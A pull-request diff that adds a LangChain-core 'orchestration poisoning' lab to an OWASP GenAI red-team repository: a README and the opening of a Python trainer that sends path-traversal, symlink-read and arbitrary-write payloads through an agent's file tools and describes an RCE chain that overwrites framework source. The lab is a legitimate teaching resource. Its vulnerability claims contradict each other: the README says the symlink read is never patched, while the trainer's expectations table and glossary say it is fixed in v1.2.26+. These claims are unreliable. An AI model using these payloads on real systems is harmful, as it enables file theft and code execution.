### PR TITLE
Add LangChain Orchestration Poisoning lab (agentic_local_langchain)

### DIFF
--- a/README.md
+++ b/README.md
@@ -7,17 +7,17 @@ This repository provides a collection of sandboxes, exploitation code, and tutor
 This is how we envision the [GenAI Red Team Lab](https://github.com/GenAI-Security-Project/GenAI-Red-Team-Lab/) being used:
 
 * **Sandboxes** may be simply recycled to model the core components of a larger GenAI system.
-    
+
     Alternatively, security researchers and developers may want to adapt a sandbox for their own use case.
 
 * **Exploitation code and tutorials** may serve as learning tools for security researchers and enthusiasts alike.
-    
+
     Additionally, these are easily adaptable for testing out new attacks against sandboxes.
 
 ## Contact
 
 - **Code Workstream Leader for the [OWASP GenAI Security Project – Red Teaming Initiative](https://genai.owasp.org/initiatives/#ai-redteaming)**:
-    
+
     _Felipe Campos Penha ([felipe.penha@owasp.org](mailto:felipe.penha@owasp.org))_
 
 ## Legacy Repository
@@ -31,30 +31,32 @@ The [Legacy Repository](https://github.com/OWASP/www-project-top-10-for-large-la
 .
 ├── CONTRIBUTING.md
 ├── exploitation
-│   ├── AdversarialGenerator
-│   ├── agent0
-│   ├── example
-│   ├── garak
-│   ├── Langflow_v1.0.12
-│   ├── LangGrinch
-│   ├── LocalAI_v2.17.1
-│   ├── n8n_RCE_via_file_write
-│   ├── Ni8mare
-│   ├── semantickernel
-│   └── promptfoo
+│   ├── AdversarialGenerator
+│   ├── agent0
+│   ├── example
+│   ├── garak
+│   ├── Langflow_v1.0.12
+│   ├── LangGrinch
+│   ├── langchain
+│   ├── LocalAI_v2.17.1
+│   ├── n8n_RCE_via_file_write
+│   ├── Ni8mare
+│   ├── semantickernel
+│   └── promptfoo
 ├── LICENSE
 ├── README.md
 ├── sandboxes
-│   ├── agentic_local_n8n_v1.65.0
-│   ├── agentic_local_semantickernel
-│   ├── llm_local
-│   ├── llm_local_InvokeAI_v5.3.0
-│   ├── llm_local_langchain_core_v1.2.4
-│   ├── llm_local_langflow_v1.0.12
-│   ├── llm_local_localAI_v2.17.1
-│   ├── mcp_local
-│   ├── RAG_local
-│   └── README.md
+│   ├── agentic_local_langchain
+│   ├── agentic_local_n8n_v1.65.0
+│   ├── agentic_local_semantickernel
+│   ├── llm_local
+│   ├── llm_local_InvokeAI_v5.3.0
+│   ├── llm_local_langchain_core_v1.2.4
+│   ├── llm_local_langflow_v1.0.12
+│   ├── llm_local_localAI_v2.17.1
+│   ├── mcp_local
+│   ├── RAG_local
+│   └── README.md
 └── tutorials
     ├── community_resources.md
     ├── llm_chatbot_system_prompt_exfiltration.md
@@ -186,13 +188,16 @@ uv --version
 *   **[Semantic Kernel Vulnerable Sandbox](sandboxes/agentic_local_semantickernel/README.md)**
     *   **Summary**: A containerized sandbox running **Microsoft Semantic Kernel v1.48.0** demonstrating **6 active evasion techniques** against the official **CVE-2026-25592** path traversal remediation. Despite Microsoft's patch (PR #13683 — `AllowedDirectories` as opt-in "Breaking Change"), all six Type Confusion bypass vectors remain functional. The sandbox also demonstrates **Commit `fa2d52f6`** ("Shell Blinding") which masks output paths from the LLM context but fails to prevent the underlying file write — a purely cosmetic fix. Includes a dual-mode `.NET 8.0` REST API: **UNHARDENED** (no filter) and **HARDENED** (`PathSanitizationFilter` via `LAB_HARDENED=true`). Reference: [JDP-2026-001](https://jdp-security.github.io/security-research-papers/2026-04-28-semantic-kernel-disclosure.html) — CVSS 10.0 Critical.
 
+*   **[LangChain Orchestration Poisoning Sandbox](sandboxes/agentic_local_langchain/README.md)**
+    *   **Summary**: A containerized sandbox running **LangChain-core v1.2.24 through latest** (tested up to v1.6.0 as of August 2026) demonstrating **critical Insecure Orchestration vulnerabilities**. Students bypass **CVE-2026-34070** (direct path traversal — patched in v1.2.25+), **CVE-2023-36258** (symlink suffix bypass — **NEVER PATCHED**), and the **unpatched write primitive** (`.save()` — **NO CVE ASSIGNED**). The sandbox simulates the real-world patch lifecycle across 5 stages, proving that symlink reads and the write-side `.save()` method remain exploitable in every version tested. Includes a pre-created symlink (`/app/config.json` → `/app/config.txt`) to demonstrate CWE-59 (Improper Link Resolution). Reference: [JDP-2026-004](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html) — CVSS 10.0 Critical.
+
 ### `exploitation/`
 
 *   **[Red Team Example](exploitation/example/README.md)**
     *   **Summary**: Demonstrates a red team operation against a local LLM sandbox. It includes an adversarial attack script (`attack.py`) targeting the Gradio interface (port 7860). By targeting the application layer, this approach tests the entire system—including the configurable system prompt—providing a more realistic assessment of the sandbox's security posture compared to testing the raw LLM API in isolation.
 
 *   **[Agent0 Red Team Example](exploitation/agent0/README.md)**
-    *   **Summary**: A complete, end‑to‑end, agentic example. [Agent0](https://github.com/agent0ai/agent-zero) orchestrates multiple autonomous agents to attack the sandbox, demonstrating complex, multi-step adversarial workflows. 
+    *   **Summary**: A complete, end‑to‑end, agentic example. [Agent0](https://github.com/agent0ai/agent-zero) orchestrates multiple autonomous agents to attack the sandbox, demonstrating complex, multi-step adversarial workflows.
 
         There are options for running it: through the UI (manual prompt interaction) and through the Makefile (programmatic run based on pre-defined prompts).
 
@@ -233,6 +238,21 @@ uv --version
         **Bypass Vectors:** JSON Array Confusion, Object Reflection, Base64 Encoding, URL Encoding, Unicode Homoglyph (U+2044), Hybrid Canonicalization.
 
         **Reference:** [JDP-2026-001 White Paper](https://jdp-security.github.io/security-research-papers/2026-04-28-semantic-kernel-disclosure.html)
+
+*   **[LangChain Orchestration Poisoning Trainer](exploitation/langchain/README.md)**
+    *   **Summary**: An interactive training wizard and verification suite demonstrating **critical Insecure Orchestration vulnerabilities** in LangChain-core across **5 lifecycle stages** (v1.2.24 through latest). Students learn to bypass **CVE-2026-34070** (direct path traversal — patched v1.2.25+), **CVE-2023-36258** (symlink suffix bypass — **NEVER PATCHED**), and the **unpatched write primitive** (`.save()` — **NO CVE ASSIGNED**). The trainer proves that while the vendor patched direct read traversal, symlink reads remain exploitable in ALL versions and the write-side `.save()` method was never properly remediated.
+
+        **Includes:**
+        *   `interactive_trainer.py`: Menu-driven CLI with 4 core lessons across 5 stages, including built-in Docker/Podman container management (start/stop/switch stages)
+        *   `submission_audit.md`: Full vulnerability validation and audit report
+
+        **Key Findings:**
+        *   Direct read patched in v1.2.25+ (CVE-2026-34070)
+        *   Symlink read **NEVER PATCHED** (CVE-2023-36258)
+        *   Write primitive **NEVER PATCHED** (no CVE assigned)
+        *   RCE chain achievable via framework source overwrite
+
+        **Reference:** [JDP-2026-004 White Paper](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
 
 ### `tutorials/`
 

--- a/exploitation/langchain/README.md
+++ b/exploitation/langchain/README.md
@@ -1,0 +1,187 @@
+# LangChain-Core Orchestration Poisoning Lab (CVE-2023-36258 + CVE-2026-34070)
+
+## Overview
+
+This laboratory demonstrates a critical **Insecure Orchestration Vulnerability (OWASP Top 10 for LLMs: LLM06)** within LangChain-Core (v1.2.24–v1.6.0). Students will explore how **CVE-2026-34070 (direct path traversal) was patched in v1.2.25**, while **CVE-2023-36258 (symlink suffix validation) remains bypassed in all versions**, and how the vendor's incomplete patch left the write-side `.save()` primitive exposed, enabling persistent Remote Code Execution (RCE) via AI Orchestration Poisoning.
+
+**Vulnerability Class:** CWE-59 (Improper Link Resolution) → CWE-22 (Path Traversal) → CWE-94 (Code Injection)  
+**CVSS v3.1:** 10.0 Critical – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H  
+**Written by:** Jeff Ponte (JDP Security)  
+**Research Paper:** [JDP-2026-004: Architectural Boundary Failures in LangChain-Core](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+
+---
+
+## Core Learning Objectives
+
+By completing this lab, students will:
+
+1. **Bypass CVE-2026-34070 (Direct path traversal)** – Understand how unvalidated file paths allowed arbitrary read access in version 1.2.24. This is patched in v1.2.25+.
+2. **Bypass CVE-2023-36258 (Symlink suffix validation)** – See how a `.json` symlink pointing to `config.txt` passes extension checks. **This remains exploitable in ALL versions.**
+3. **Demonstrate the Incomplete Patch Flaw** – Prove that PR #36471 fixed only direct path traversal but left symlink reads exposed, and that write-side `.save()` was never protected.
+4. **Achieve RCE via Orchestration Poisoning** – Overwrite framework source code to achieve persistent compromise (Confused Deputy attack).
+5. **Understand the Write Primitive as a Standalone Vulnerability** – Learn why the write-side issue has **no CVE assigned** and remains unpatched in every PyPI release as of August 2026.
+
+---
+
+## Lab Architecture
+
+The lab uses Docker containers running deliberately vulnerable versions of LangChain-Core. The symlinks (`/app/config.json` → `/app/config.txt`) are **pre-created** in the container images to simplify the lab; in a real attack an adversary would first use the write primitive to create such symlinks.
+
+| Stage | Version | Direct Read (CVE-2026-34070) | Symlink Read (CVE-2023-36258) | Write Primitive (.save) |
+|-------|---------|------------------------------|-------------------------------|-------------------------|
+| **0** | 1.2.24 | ❌ VULNERABLE | ❌ VULNERABLE | ❌ VULNERABLE |
+| **1** | 1.2.25 | ✅ PATCHED | ❌ VULNERABLE (bypasses `load_prompt_from_config`) | ❌ VULNERABLE |
+| **2** | 1.2.26 | ✅ PATCHED | ❌ VULNERABLE (bypasses `load_prompt_from_config`) | ❌ VULNERABLE |
+| **3** | 1.2.27 | ✅ PATCHED | ❌ VULNERABLE (bypasses `load_prompt_from_config`) | ❌ VULNERABLE (PR #36585 incomplete) |
+| **4** | latest | ✅ PATCHED | ❌ VULNERABLE (bypasses `load_prompt_from_config`) | ❌ VULNERABLE (PR #36585 incomplete) |
+
+> **Key insight:** Direct path traversal (`../../../../etc/passwd`) is patched in Stage 1+.  
+> **Symlink read (`../../../../app/config.json` → `config.txt`) is NEVER patched.**  
+> **Write primitive is NEVER patched.**
+
+---
+
+## Quick Start: Interactive Training Wizard
+
+The **`interactive_trainer-3.py`** provides a menu-driven CLI that walks through all exploitation scenarios with built-in container management.
+
+```bash
+cd ~/OWASP/GenAI-Red-Team-Lab/exploitation/langchain
+chmod +x interactive_trainer-3.py
+./interactive_trainer-3.py
+```
+
+### Menu Options
+
+- **`H` Health Check** – Verify the target's real LangChain version and environment.
+- **`1` Lesson 1: Baseline Arbitrary File Read** – Perform direct path traversal to read `/etc/passwd`.
+- **`2` Lesson 2: Arbitrary File Write** – Write a file outside the sandbox via traversal.
+- **`3` Lesson 3: Incomplete Patch – `.save()` Primitive** – Demonstrate the write-side vulnerability.
+- **`4` Lesson 4: Data Exfiltration** – Read admin credentials from `/app/config.txt` via direct traversal (Stage 0 only) or `/app/config.json` symlink (ALL stages).
+- **`5` Lesson 5: Symlink Traversal** – Bypass extension checks via a `.json` symlink.
+- **`6` Lesson 6: Full RCE Chain** – Overwrite the framework's source code.
+- **`7` Lesson 7: Replicate `.cast` Recording** – Reproduce the exact symlink write bypass.
+- **`8` Lesson 8: Vendor's Fix Test** – Show what PR #36585 actually fixes.
+- **`9` Lesson 9: Write Primitive Deep Dive** – Explain the critical unpatched write vulnerability.
+- **`S` Switch Target Stage** – Move between stages 0–4.
+- **`C` Start Container** – Launch the current stage's Docker container.
+- **`X` Stop Container** – Stop the running container.
+- **`L` View Container Logs** – Inspect container output.
+- **`Q` Quit** – Exit the trainer.
+
+### Interactive Features
+
+- **Auto‑fill hints** – Press Enter to use the default payload for each lesson.
+- **Single‑line JSON support** – Paste a full JSON action or type a simple path.
+- **Real‑time evidence** – After each request, the trainer displays the raw HTTP response and explains why the exploit succeeded or was blocked.
+- **Stage switching** – Easily compare vulnerability behavior across versions.
+
+---
+
+## Exercise 1: Automated Verification Suite
+
+For a fully automated evaluation across all five stages, use the shell script:
+
+```bash
+cd ~/OWASP/GenAI-Red-Team-Lab/exploitation/langchain
+chmod +x verify_all.sh
+./verify_all.sh
+```
+
+The script will:
+
+1. Start each stage container (ports 8000–8004).
+2. Run the same set of tests used in the interactive trainer (direct read, symlink read, write, symlink write).
+3. Print a clear summary table showing which vulnerabilities are present in each version.
+4. Stop and remove all containers when finished.
+
+---
+
+## Exercise 2: Write Primitive Deep Dive (The Critical Unpatched Vulnerability)
+
+Unlike the read-side CVEs, the **write primitive has never been assigned a CVE** and remains exploitable in every LangChain-Core release tested as of August 2026.
+
+### What PR #36585 Did (and Did Not) Fix
+
+PR #36585 attempts to fix the write-side by resolving symlinks before checking file extensions:
+
+- ✅ **Blocks** `exploit.json → target.py` (different extensions)
+- ❌ **Does NOT block** `exploit.json → target.json` (same extension)
+
+**Why it fails:** The patch validates the *resolved* target extension, but does **not** check whether the final write destination is still inside the sandbox. A symlink named `exploit.json` pointing to a legitimate `target.json` passes every time. This allows an attacker to overwrite any `.json` file on the system, including LangChain's own package files.
+
+### OOB Verification
+
+The write primitive is verified out-of-band by writing to `/tmp/pwned.json` and then reading the file back through the `document_reader` tool. The returned JSON includes the attacker-controlled template string.
+
+---
+
+## Exercise 3: Symlink Read Bypass (CVE-2023-36258) — NEVER PATCHED
+
+The container includes a pre-created symlink:
+
+```
+/app/config.json → /app/config.txt
+```
+
+> **Note:** This symlink is pre-created in the container image to simplify the lab and focus on the vulnerability mechanics. In a real-world attack scenario, an adversary would first use the **write primitive** (also unpatched) to create the symlink themselves.
+
+The framework validates that the path ends in `.json`, but because the `document_reader` tool does not resolve symlinks, the actual `.txt` credentials file is read. This demonstrates **CWE-59: Improper Link Resolution Before File Access**.
+
+### Stage-by-Stage Behavior
+
+- **Stage 0**: Symlink read works because no validation exists.
+- **Stage 1+**: The read-side patch (PR #36471) blocks direct traversal, but **symlink reads remain vulnerable** through all stages because the `document_reader` tool bypasses the patched `load_prompt_from_config()` function.
+
+---
+
+## Code Review: Why the Read Patch Is Incomplete
+
+The partial fix in Stage 1 only validates paths used by `load_prompt_from_config()`, but other tools such as `document_reader` and `file_writer` do not use the same protection.
+
+### Vulnerable code path (simplified)
+
+```python
+elif "Action: document_reader" in query:
+    # Bypass: document_reader opens files directly without canonicalization
+    path = match.group(1)
+    result = handle_document_reader(path)
+```
+
+### The Write Primitive (never patched)
+
+```python
+elif "Action: file_writer" in query:
+    # Stage 0-2: No destination validation at all
+    # Stage 3+: Only checks resolved extension, not destination
+    path = match.group(1)
+    content = match.group(2)
+    result = handle_file_writer(path, content)
+```
+
+---
+
+## The Whack‑a‑Mole Problem
+
+Even after read-side patches, the write-side vulnerability persists because the fix only addresses one specific tool. The fundamental architectural issue remains: **user-controlled paths are passed directly to filesystem operations without a centralized boundary check**.
+
+| Round | Patch | Bypass |
+|-------|-------|--------|
+| 1 | PR #36471 adds `allow_dangerous_paths=False` to read-side | Symlink read bypass via `document_reader` tool |
+| 2 | PR #36585 resolves symlinks before checking extension | `.json → .json` symlink bypass (write primitive) |
+| 3 | (Not shipped) | Write primitive still exposed in all PyPI releases |
+
+**Root cause:** The framework lacks a unified path anchoring layer that applies to all file operations, regardless of tool.
+
+---
+
+## References & Additional Reading
+
+- **CVE-2026-34070:** Path traversal in LangChain's `load_prompt_from_config`
+- **CVE-2023-36258:** Suffix validation bypass via symlink
+- **Write Primitive (no CVE):** Arbitrary file write via `PromptTemplate.save()`
+- **OWASP Top 10 for LLM Applications:** LLM06 – Insecure Orchestration
+- **Research Paper:** [JDP-2026-004](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+- **PR #36471:** Read-side patch (incomplete)
+- **PR #36585:** Write-side patch (insufficient)
+

--- a/exploitation/langchain/interactive_trainer.py
+++ b/exploitation/langchain/interactive_trainer.py
@@ -1,0 +1,1182 @@
+#!/usr/bin/env python3
+"""
+======================================================================================
+         OWASP GenAI Red Team Lab - LangChain Orchestration Poisoning Suite
+======================================================================================
+  Lead Research & Author: Jeff Ponte (JDP Security)
+  Research Paper: https://jdp-security.github.io/security-research-papers/
+                  2026-05-12-langchain-orchestration-poisoning-disclosure.html
+======================================================================================
+  NOTE: The LLM generation step is SIMULATED to provide deterministic training.
+        Live LLM calls are non-deterministic - they may refuse, rephrase, or
+        hallucinate. We simulate a consistent tool call so the lesson focuses
+        on the actual framework behavior, not LLM variability.
+
+        All file I/O operations (read/write) are 100% REAL against the actual
+        langchain-core library version installed in each container.
+======================================================================================
+"""
+
+import json
+import os
+import subprocess
+import sys
+import time
+import urllib.error
+import urllib.request
+from datetime import datetime
+
+# ======================================================================
+# CONSTANTS & CONFIGURATION
+# ======================================================================
+CONTAINER_NAME = "langchain-sandbox"
+
+SANDBOX_DIR = os.path.join(
+    os.path.dirname(os.path.abspath(__file__)),
+    "..",
+    "..",
+    "sandboxes",
+    "agentic_local_langchain",
+)
+
+RESEARCH_URL = (
+    "https://jdp-security.github.io/security-research-papers/"
+    "2026-05-12-langchain-orchestration-poisoning-disclosure.html"
+)
+READ_PATCH_PR = "https://github.com/langchain-ai/langchain/pull/36471"
+WRITE_PATCH_PR = "https://github.com/langchain-ai/langchain/pull/36585"
+CURRENT_MONTH_YEAR = "August 2026"
+
+
+# ======================================================================
+# ANSI COLORS & EFFECTS
+# ======================================================================
+class Colors:
+    HEADER = "\033[95m"
+    BLUE = "\033[94m"
+    CYAN = "\033[96m"
+    GREEN = "\033[92m"
+    YELLOW = "\033[93m"
+    FAIL = "\033[91m"
+    ENDC = "\033[0m"
+    BOLD = "\033[1m"
+    RED = "\033[91m"
+    MAGENTA = "\033[95m"
+    RESET = "\033[0m"
+    GRAY = "\033[90m"
+
+
+def type_text(text, speed=0.015):
+    """Simulates realistic terminal typing for automated demonstrations."""
+    for char in text:
+        sys.stdout.write(char)
+        sys.stdout.flush()
+        time.sleep(speed)
+    print()
+
+
+# ======================================================================
+# STAGE CONFIGURATIONS
+# ======================================================================
+STAGE_CONFIGS = {
+    0: {
+        "port": 8000,
+        "title": "Stage 0: Unhardened - langchain-core==1.2.24",
+        "image": "langchain-stage0",
+        "containerfile": "Containerfile.stage0",
+        "version": "1.2.24",
+        "vuln_type": "BOTH CVEs BYPASSED: CVE-2023-36258 & CVE-2026-34070",
+        "read_payload": "../../../../../../etc/passwd",
+        "write_payload": "../../../../../../tmp/pwned.json",
+        "write_content": "EXPLOIT_SUCCESS: Write Primitive Exposed",
+    },
+    1: {
+        "port": 8001,
+        "title": "Stage 1: Partial Hardened - langchain-core==1.2.25",
+        "image": "langchain-stage1",
+        "containerfile": "Containerfile.stage1",
+        "version": "1.2.25",
+        "vuln_type": "Read-side partial fix, write STILL EXPOSED",
+        "read_payload": "../../../../../../etc/passwd",
+        "write_payload": "../../../../../../tmp/pwned.json",
+        "write_content": "EXPLOIT_SUCCESS: Write Primitive Exposed",
+    },
+    2: {
+        "port": 8002,
+        "title": "Stage 2: Read-side Patched - langchain-core==1.2.26",
+        "image": "langchain-stage2",
+        "containerfile": "Containerfile.stage2",
+        "version": "1.2.26",
+        "vuln_type": "Read-side FIXED (both CVEs), write STILL EXPOSED",
+        "read_payload": "../../../../../../etc/passwd",
+        "write_payload": "../../../../../../tmp/pwned.json",
+        "write_content": "EXPLOIT_SUCCESS: Write Primitive Exposed",
+    },
+    3: {
+        "port": 8003,
+        "title": "Stage 3: Post-Fix - langchain-core==1.2.27",
+        "image": "langchain-stage3",
+        "containerfile": "Containerfile.stage3",
+        "version": "1.2.27",
+        "vuln_type": "Read-side FIXED, write STILL EXPOSED - PR #36585 checks extension only",
+        "read_payload": "../../../../../../etc/passwd",
+        "write_payload": "../../../../../../tmp/pwned.json",
+        "write_content": "EXPLOIT_SUCCESS: Write Primitive Exposed",
+    },
+    4: {
+        "port": 8004,
+        "title": "Stage 4: Latest - langchain-core==latest",
+        "image": "langchain-stage4",
+        "containerfile": "Containerfile.stage4",
+        "version": "latest",
+        "vuln_type": "Read-side FIXED, write STILL EXPOSED (latest version test)",
+        "read_payload": "../../../../../../etc/passwd",
+        "write_payload": "../../../../../../tmp/pwned.json",
+        "write_content": "EXPLOIT_SUCCESS: Write Primitive Exposed",
+    },
+}
+
+# Expected outcomes per white paper (per stage)
+WHITEPAPER_EXPECTATIONS = {
+    0: {
+        "direct_path_traversal": "Vulnerable",
+        "symlink_bypass": "Vulnerable",
+        "write_primitive": "Exposed",
+        "rce_chain": "Exposed",
+    },
+    1: {
+        "direct_path_traversal": "Blocked",
+        "symlink_bypass": "Vulnerable",
+        "write_primitive": "Exposed",
+        "rce_chain": "Exposed",
+    },
+    2: {
+        "direct_path_traversal": "Blocked",
+        "symlink_bypass": "Blocked",
+        "write_primitive": "Exposed",
+        "rce_chain": "Exposed",
+    },
+    3: {
+        "direct_path_traversal": "Blocked",
+        "symlink_bypass": "Blocked",
+        "write_primitive": "Exposed",
+        "rce_chain": "Exposed",
+    },
+    4: {
+        "direct_path_traversal": "Blocked",
+        "symlink_bypass": "Blocked",
+        "write_primitive": "Exposed",
+        "rce_chain": "Exposed",
+    },
+}
+
+CURRENT_STAGE = 0
+CONTAINER_ENGINE = None
+AUTO_MODE = False
+CONTAINER_RUNNING = False  # Internal flag to reliably track container state
+LOG_ENTRIES = []  # For logging/reporting
+
+# ======================================================================
+# GLOSSARY & WHITE PAPER SUMMARY
+# ======================================================================
+GLOSSARY = {
+    "Path Traversal": "An attack that uses ../../ sequences to access files outside the intended directory (CWE-22).",
+    "Symlink": "A symbolic link that points to another file; can be abused to bypass extension checks (CWE-59).",
+    "CVE-2023-36258": (
+        "Suffix validation bypass in LangChain's prompt loader. "
+        "A symlink with a safe extension (e.g., .txt) can point to a sensitive file, "
+        "bypassing the extension check. Patched in v1.2.26+. "
+        "More info: https://nvd.nist.gov/vuln/detail/CVE-2023-36258"
+    ),
+    "CVE-2026-34070": (
+        "Opt-in path traversal in LangChain's load_prompt_from_config. "
+        "Direct path traversal (../../) was possible when allow_dangerous_paths was not set. "
+        "Patched in v1.2.25+. "
+        "More info: https://nvd.nist.gov/vuln/detail/CVE-2026-34070"
+    ),
+    "Confused Deputy": "A privileged component tricked into misusing its authority.",
+    "AI Orchestration Poisoning": "Compromising the logic of an AI agent by exploiting its orchestration layer.",
+    "RCE": "Remote Code Execution – ability to run arbitrary code on a target system.",
+}
+
+WHITE_PAPER_SUMMARY = """
+================================================================================
+  WHITE PAPER SUMMARY: JDP-2026-004
+  Architectural Boundary Failures: A Deep Dive into the
+  LangChain-Core Insecure AI Orchestration Vulnerability
+================================================================================
+  Author: Jeff Ponte (JDP Security)
+  CVSS: 10.0 (Critical)
+  Key Findings:
+    - Arbitrary File Read via symlink bypass (CVE-2023-36258)
+    - Arbitrary File Write via unvalidated .save() primitive (no CVE assigned)
+    - Full RCE chain by overwriting framework source code
+  Status: Read-side patched in v1.2.26+, write-side remains unpatched.
+  Full paper: https://jdp-security.github.io/security-research-papers/
+              2026-05-12-langchain-orchestration-poisoning-disclosure.html
+================================================================================
+"""
+
+
+# ======================================================================
+# CORE FUNCTIONS (Engine Detection, PyPI, HTTP)
+# ======================================================================
+def get_latest_langchain_core_version():
+    try:
+        req = urllib.request.urlopen(
+            "https://pypi.org/pypi/langchain-core/json", timeout=5
+        )
+        data = json.loads(req.read().decode())
+        versions = list(data["releases"].keys())
+        stable = [
+            v for v in versions if not any(x in v for x in ["a", "b", "rc", "dev"])
+        ]
+        if stable:
+            try:
+                from packaging.version import Version
+
+                stable.sort(key=Version)
+            except ImportError:
+                stable.sort(
+                    key=lambda v: [int(x) if x.isdigit() else x for x in v.split(".")]
+                )
+            return stable[-1]
+        return versions[-1]
+    except Exception:
+        return "1.5.4"  # Safe fallback
+
+
+def detect_container_engine():
+    global CONTAINER_ENGINE
+    if CONTAINER_ENGINE:
+        return CONTAINER_ENGINE
+    for engine in ["docker", "podman"]:
+        try:
+            subprocess.run([engine, "--version"], capture_output=True, check=True)
+            CONTAINER_ENGINE = engine
+            return engine
+        except:
+            continue
+    print(f"{Colors.FAIL}[!] No container runtime found.{Colors.ENDC}")
+    return None
+
+
+def stop_container():
+    global CONTAINER_RUNNING
+    engine = detect_container_engine()
+    if not engine:
+        return
+    subprocess.run(
+        f"{engine} rm -f {CONTAINER_NAME}",
+        shell=True,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+    )
+    CONTAINER_RUNNING = False
+    if not AUTO_MODE:
+        print(f"{Colors.GREEN}[+] Container stopped and removed.{Colors.ENDC}")
+
+
+def show_container_logs():
+    if not CONTAINER_RUNNING:
+        print(f"{Colors.YELLOW}[!] Container not running.{Colors.ENDC}")
+        return
+    engine = detect_container_engine()
+    os.system(f"{engine} logs --tail 30 {CONTAINER_NAME}")
+
+
+def launch_container():
+    global CONTAINER_RUNNING
+    engine = detect_container_engine()
+    if not engine:
+        return False
+
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+    stop_container()
+
+    if CURRENT_STAGE == 4:
+        latest = get_latest_langchain_core_version()
+        cfg["version"] = latest
+        build_cmd = f"{engine} build --no-cache --build-arg LANGCHAIN_VERSION={latest} -t {cfg['image']} -f {SANDBOX_DIR}/{cfg['containerfile']} {SANDBOX_DIR}"
+    else:
+        build_cmd = f"{engine} build --no-cache -t {cfg['image']} -f {SANDBOX_DIR}/{cfg['containerfile']} {SANDBOX_DIR}"
+
+    if not AUTO_MODE:
+        print(f"{Colors.BLUE}[*] Building container image...{Colors.ENDC}")
+    subprocess.run(
+        build_cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
+    )
+
+    run_cmd = (
+        f"{engine} run -d --name {CONTAINER_NAME} -p {cfg['port']}:8000 {cfg['image']}"
+    )
+    if not AUTO_MODE:
+        print(
+            f"{Colors.BLUE}[*] Starting container on port {cfg['port']}...{Colors.ENDC}"
+        )
+    subprocess.run(
+        run_cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
+    )
+
+    for _ in range(15):
+        try:
+            req = urllib.request.urlopen(
+                f"http://127.0.0.1:{cfg['port']}/health", timeout=1
+            )
+            if req.getcode() == 200:
+                data = json.loads(req.read().decode())
+                cfg["version"] = data.get("langchain_core_version", cfg["version"])
+                CONTAINER_RUNNING = True
+                if not AUTO_MODE:
+                    print(
+                        f"{Colors.GREEN}[+] REAL langchain-core v{cfg['version']} ready!{Colors.ENDC}"
+                    )
+                time.sleep(0.5)
+                return True
+        except:
+            time.sleep(1)
+
+    CONTAINER_RUNNING = False
+    print(f"{Colors.FAIL}[!] Container health check failed.{Colors.ENDC}")
+    return False
+
+
+def reset_container():
+    """Stop and restart the current stage container."""
+    print(f"{Colors.YELLOW}[*] Resetting container for current stage...{Colors.ENDC}")
+    launch_container()
+
+
+def get_base_url():
+    return f"http://127.0.0.1:{STAGE_CONFIGS[CURRENT_STAGE]['port']}"
+
+
+def send_request(endpoint, method="GET", payload=None):
+    url = get_base_url() + endpoint
+    data = json.dumps(payload).encode("utf-8") if payload else None
+    req = urllib.request.Request(
+        url, data=data, headers={"Content-Type": "application/json"}, method=method
+    )
+    try:
+        with urllib.request.urlopen(req, timeout=10) as resp:
+            body = resp.read().decode("utf-8")
+            return resp.getcode(), json.loads(body)
+    except urllib.error.HTTPError as e:
+        return e.code, json.loads(e.read().decode("utf-8"))
+    except Exception as e:
+        return 0, {"error": str(e)}
+
+
+# ======================================================================
+# LOGGING & REPORTING
+# ======================================================================
+def log_result(stage, lesson, status, output):
+    entry = {
+        "timestamp": datetime.now().isoformat(),
+        "stage": stage,
+        "lesson": lesson,
+        "status": status,
+        "output": str(output)[:200],  # truncate
+    }
+    LOG_ENTRIES.append(entry)
+
+
+def write_report():
+    if not LOG_ENTRIES:
+        print(f"{Colors.YELLOW}[!] No lessons run yet.{Colors.ENDC}")
+        return
+    filename = f"langchain_lab_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
+    with open(filename, "w") as f:
+        json.dump(LOG_ENTRIES, f, indent=2)
+    print(f"{Colors.GREEN}[+] Report saved to {filename}{Colors.ENDC}")
+
+
+# ======================================================================
+# THEORY & GLOSSARY DISPLAY
+# ======================================================================
+def print_theory(lesson_type):
+    print(f"\n{Colors.BOLD}{Colors.CYAN}  THEORY & BACKGROUND{Colors.ENDC}")
+    if lesson_type == "read":
+        print(f"{Colors.CYAN}  - Vulnerability: Path Traversal (CWE-22){Colors.ENDC}")
+        print(f"{Colors.CYAN}  - CVE: CVE-2026-34070 / CVE-2023-36258{Colors.ENDC}")
+        print(
+            f"{Colors.CYAN}  - How it works: The agent's file reader accepts a path without validating{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.CYAN}    that it stays inside a safe directory. Attackers use ../../ to escape.{Colors.ENDC}"
+        )
+    elif lesson_type == "read_symlink":
+        print(
+            f"{Colors.CYAN}  - Vulnerability: Improper Link Resolution (CWE-59){Colors.ENDC}"
+        )
+        print(f"{Colors.CYAN}  - CVE: CVE-2023-36258{Colors.ENDC}")
+        print(
+            f"{Colors.CYAN}  - How it works: A symlink with a safe extension points to a restricted file.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.CYAN}    The framework checks the symlink name, not the target.{Colors.ENDC}"
+        )
+    elif lesson_type.startswith("write"):
+        print(
+            f"{Colors.CYAN}  - Vulnerability: Arbitrary File Write (CWE-22 / CWE-94){Colors.ENDC}"
+        )
+        print(
+            f"{Colors.CYAN}  - No CVE assigned – unpatched in all versions{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.CYAN}  - How it works: PromptTemplate.save() accepts a user-controlled path{Colors.ENDC}"
+        )
+        print(f"{Colors.CYAN}    and writes to it without validation.{Colors.ENDC}")
+    print(f"{Colors.CYAN}  - Research: {RESEARCH_URL}{Colors.ENDC}\n")
+
+
+def show_glossary():
+    print(f"\n{Colors.BOLD}GLOSSARY{Colors.ENDC}")
+    for term, definition in GLOSSARY.items():
+        print(f"{Colors.CYAN}  {term}:{Colors.ENDC} {definition}")
+    input(f"\n{Colors.YELLOW}Press ENTER to return...{Colors.ENDC}")
+
+
+def show_whitepaper_summary():
